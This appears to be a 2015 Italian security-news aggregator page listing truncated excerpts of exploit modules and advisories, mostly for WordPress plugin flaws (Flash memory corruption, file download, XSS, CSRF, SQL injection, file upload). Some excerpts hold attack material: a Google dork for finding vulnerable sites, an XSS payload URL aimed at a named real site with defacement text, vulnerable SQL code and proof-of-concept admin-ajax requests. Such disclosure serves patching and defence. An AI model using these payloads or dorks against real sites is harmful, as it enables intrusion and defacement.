Adobe Flash Player Drawing Fill Shader Memory Corruption

28 giugno 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
      'Description'         => %q{
        This module exploits a memory corruption happening when applying a Shader as a drawing fill
        as exploited in the wild on June 2015. This module has been tested successfully on:
 
        Windows 7 SP1 (32-bit), IE11 and Adobe Flash...

Leggi il seguito »

WordPress WP-Instance-Rename 1.0 File Download

28 giugno 2015 - Fonte: http://www.mondounix.com
Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory:
 
try{
  $dbname   = $_GET["dbname"];
  $dumpfname...

Leggi il seguito »

WordPress Nextend Twitter Connect 1.5.1 Cross Site Scripting

28 giugno 2015 - Fonte: http://www.mondounix.com
Wordpress “Nextend Twitter Connect”
===================================
Document Title:
===============
WordPress “Nextend Twitter Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)
 
Download URL:
 
=============
 
https://wordpress.org/plugins/nextend-twitter-connect/
 
Release Date:
 
=============
2015-06-20
 
Vulnerability CVE ID:
 
=====================
CVE-2015-4557
 
Vulnerability Disclosure Timeline:
 
==================================
2015 – 06 – 15 First notified to WordPress.
2015 – 06 – 15 First notified to plugin vendor .
2015 – 06 – 15 First notified to Mitre for CVE number.
2015 – 06 – 16 Vendor publish update...

Leggi il seguito »

WordPress Front-end Editor File Upload

24 giugno 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Wordpress Front-end Editor File Upload',
      'Description'    => %q{
          The Wordpress Front-end Editor plugin contains an authenticated file upload
          vulnerability. We can upload arbitrary files to the upload folder, because
          the plugin also uses it's own file upload mechanism instead of the...

Leggi il seguito »

WordPress Revslider 4.2.2 XSS / Information Disclosure

24 giugno 2015 - Fonte: http://www.mondounix.com
| # Title    : WordPress Revslider 4.2.2 Multi Vulnerability
| # Author   : indoushka                                                               
| # email  :indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
| # Tested on: windows 8.1 Français V.(Pro)        
| # Download : http://revolution.themepunch.com/                                                  
=======================================
 
XSS :
 
http://www.codekom.com//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka..Give%20me%20your%20wp-config.php
 
information...

Leggi il seguito »

WordPress Google Analyticator 6.4.9.3 CSRF

24 giugno 2015 - Fonte: http://www.mondounix.com
# Title: Cross-Site Request Forgery in Google Analyticator Wordpress Plugin
v6.4.9.3 before rev @1183563
# Submitter: Nitin Venkatesh
# Product: Google Analyticator Wordpress Plugin
# Product URL: https://wordpress.org/plugins/google-analyticator/
# Vulnerability Type: Cross-Site Request Forgery [CWE-352]
# Affected Versions: v6.4.9.3 before rev @1183563 and possibly earlier
# Tested versions: v6.4.9.3 rev @1168849
# Fixed Version: v6.4.9.3 rev @1183563
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1183563/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
Google Analyticator makes it super easy to view Google Analytics within your WordPress dashboard. This eliminates the need to edit your...

Leggi il seguito »

WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection

19 giugno 2015 - Fonte: http://www.mondounix.com
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
 
 Vulnerabilities (2)
=====================
 
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
 
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]."...

Leggi il seguito »

WordPress WP Photo Album Plus 6.1.2 Cross Site Scripting

19 giugno 2015 - Fonte: http://www.mondounix.com
Advisory ID: HTB23257
Product: WP Photo Album Plus WordPress Plugin
Vendor: J.N. Breetvelt
Vulnerable Version(s): 6.1.2 and probably prior
Tested Version: 6.1.2
Advisory Publication:  April 29, 2015  [without technical details]
Vendor Notification: April 29, 2015 
Vendor Patch: April 29, 2015 
Public Disclosure: May 20, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-3647
Risk Level: Medium 
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...

Leggi il seguito »

WordPress Encrypted Contact Form 1.0.4 CSRF / XSS

19 giugno 2015 - Fonte: http://www.mondounix.com
# Title: Cross-site Request Forgery & Cross-site Scripting in Encrypted
Contact Form Wordpress Plugin v1.0.4
# Submitter: Nitin Venkatesh
# Product: Encrypted Contact Form Wordpress Plugin
# Product URL: https://wordpress.org/plugins/encrypted-contact-form/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79]
# Affected Versions: v1.0.4 and possibly below.
# Tested versions: v1.0.4
# Fixed Version: v1.1
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1125443/
# Changelog: https://wordpress.org/plugins/encrypted-contact-form/changelog/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
Secure contact form for WordPress. Uses end-to-end encryption to...

Leggi il seguito »

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

19 giugno 2015 - Fonte: http://www.mondounix.com
Description
 
"media-file-manager-advanced" suffers from executing administrator actions by any authenticated user due to weak permissions checking.
An attacker can delete/update posts, Creating/Removing/Listing Directories, Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-SiteScripting.
 
Homepage
 
https://wordpress.org/plugins/media-file-manager-advanced/
 
Affected Version
 
<= 1.1.5
 
Description
 
Vulnerability Scope
 
LFD,SQL,XSS,Site Ruining and Changing of Content.
 
Authorization Required
 
User
 
Proof of Concept
 
 
Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17
 
MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER
 
folder...

Leggi il seguito »